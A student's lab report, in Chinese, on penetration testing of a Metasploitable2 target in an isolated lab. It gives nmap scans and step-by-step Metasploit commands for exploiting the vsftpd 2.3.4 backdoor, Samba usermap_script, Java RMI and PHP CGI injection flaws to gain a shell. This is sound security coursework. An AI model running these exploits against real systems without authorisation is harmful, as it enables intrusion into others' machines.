20222405 2024-2025-1 《网络与系统攻防技术》实验六实验报告
1.实验内容
经过高强度的攻击渗透操作,我现在已经熟练的掌握了Metasploit工具的用法,也深刻体会到漏洞的可怕之处,这些漏洞会严重威胁到我们的隐私安全。
2.实验过程
(1)前期渗透
①主机发现
输入命令msfconsole
进入控制台
再search arp_sweep
搜索一下
成功找到
输入use 0
使用auxiliary/scanner/discovery/arp_sweep
先ifconfig看一下靶机的ip地址
可以看到靶机的ip地址是192.168.50.175
这时我们set RHOSTS 192.168.50.175
设置目标ip地址
然后exploit
图中可以看出成功发现主机192.168.50.175
②端口扫描
输入命令nmap -sT 192.168.50.175
进行扫描
扫描结果如图
③扫描系统和漏洞
输入nmap -sV 192.168.50.175
查看服务版本信息
输入nmap -O 192.168.50.175
查看操作系统信息
输入nmap --script=vuln 192.168.50.175
进行漏洞扫描
(2)Vsftpd源码包后门漏洞(21端口)
漏洞简介:Vsftpd(Very Secure FTP Daemon)2.3.4版本的源码包被植入了恶意后门代码。这个漏洞的触发点是Vsftpd在接受用户名时,如果用户名包含特定字符串:)
,就会触发后门机制。
先nmap -sV -p 21 192.168.50.175
扫描一下目标端口的信息
可以看到21端口是开启的,而且vsftpd的版本是2.3.4,即存在漏洞的版本
接下来输入msfconsole
启动控制台
search vsftpd
搜索相关漏洞
use 1
使用exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.50.175
设置目标ip地址
exploit
开始攻击
输入uname -a、pwd、id、whoami、ifconfig
等命令都可以成功执行并输出信息,可以证明攻击成功
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞简介:Samba MS-RPC Shell命令注入漏洞(CVE-2007-2447)是Samba服务中的一个漏洞。攻击者通过端口139向远程Samba服务发送特制请求,可利用漏洞注入命令并以root权限执行,危害严重。
先nmap -sV -p 139 192.168.50.175
扫描一下目标端口的信息
输入msfconsole
启动控制台
search samba
搜索相关漏洞
use exploit/multi/samba/usermap_script
选择要使用的漏洞
set RHOSTS 192.168.50.175
设置目标ip地址
exploit
开始攻击
输入uname -a、pwd、id、whoami、ifconfig
等命令都可以成功执行并输出信息,可以证明攻击成功
(4)Java RMI SERVER命令执行漏洞(1099端口)
漏洞简介:Java RMI Server命令执行漏洞(CVE-2011-3556)允许攻击者通过1099端口向RMI注册服务发送恶意序列化对象,触发远程代码执行,导致目标系统被完全控制,危害严重。
先nmap -sV -p 1099 192.168.50.175
扫描一下目标端口的信息
接下来输入msfconsole
启动控制台
search rmi
搜索相关漏洞
use exploit/multi/misc/java_rmi_server
选择要使用的漏洞
set RHOSTS 192.168.50.175
设置目标ip地址
exploit
开始攻击
进入了meterpreter后输入sessions -i 1
和shell
这时输入uname -a、pwd、id、whoami、ifconfig
等命令都可以成功执行并输出信息,可以证明攻击成功
(5)PHP CGI参数执行注入漏洞(80端口)
漏洞简介:PHP CGI参数执行注入漏洞(CVE-2012-1823)允许攻击者通过80端口发送特制请求,利用未正确处理的参数在PHP CGI模式下执行任意命令,导致服务器被控制。
先nmap -sV -p 80 192.168.50.175
扫描一下目标端口的信息
接下来输入msfconsole
启动控制台
search php_cgi
搜索相关漏洞
use 0
使用exploit/multi/http/php_cei_arg_injection
set RHOSTS 192.168.50.175
设置目标ip地址
exploit
开始攻击
进入了meterpreter后输入sessions -i 1
和shell
输入uname -a、pwd、id、whoami
等命令都可以成功执行并输出信息,可以证明攻击成功
3.问题及解决方案
问题1:靶机Metasploitable2的网络配置不正确,导致无法正常通信。
问题1解决方案:将靶机网络模式设置为与攻击机一致,确保二者的ip地址在同一网段。
4.学习感悟、思考等
在这次实验中,我更加熟练的掌握了如何使用Metasploit进行渗透测试,了解到如何通过扫描端口和发现漏洞来攻击目标系统。具体学习了几个常见的漏洞利用方法,如Vsftpd后门漏洞、Samba命令注入漏洞、Java RMI执行漏洞和PHP CGI注入漏洞,并通过Metasploit成功地利用这些漏洞获取目标主机的控制权限。通过这些实践,我深刻感受到漏洞利用不仅需要理论知识,更要有动手实践的能力,只有不断操作,才能真正理解攻击背后的原理。